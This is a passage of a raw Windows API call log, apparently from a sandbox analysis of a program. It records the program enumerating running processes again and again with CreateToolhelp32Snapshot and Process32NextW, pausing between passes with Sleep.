(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.737] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.739] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0111.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.742] CloseHandle (hObject=0xbc) returned 1 [0111.742] Sleep (dwMilliseconds=0x12c) [0112.123] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.128] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.227] CloseHandle (hObject=0xc4) returned 1 [0112.227] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.231] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 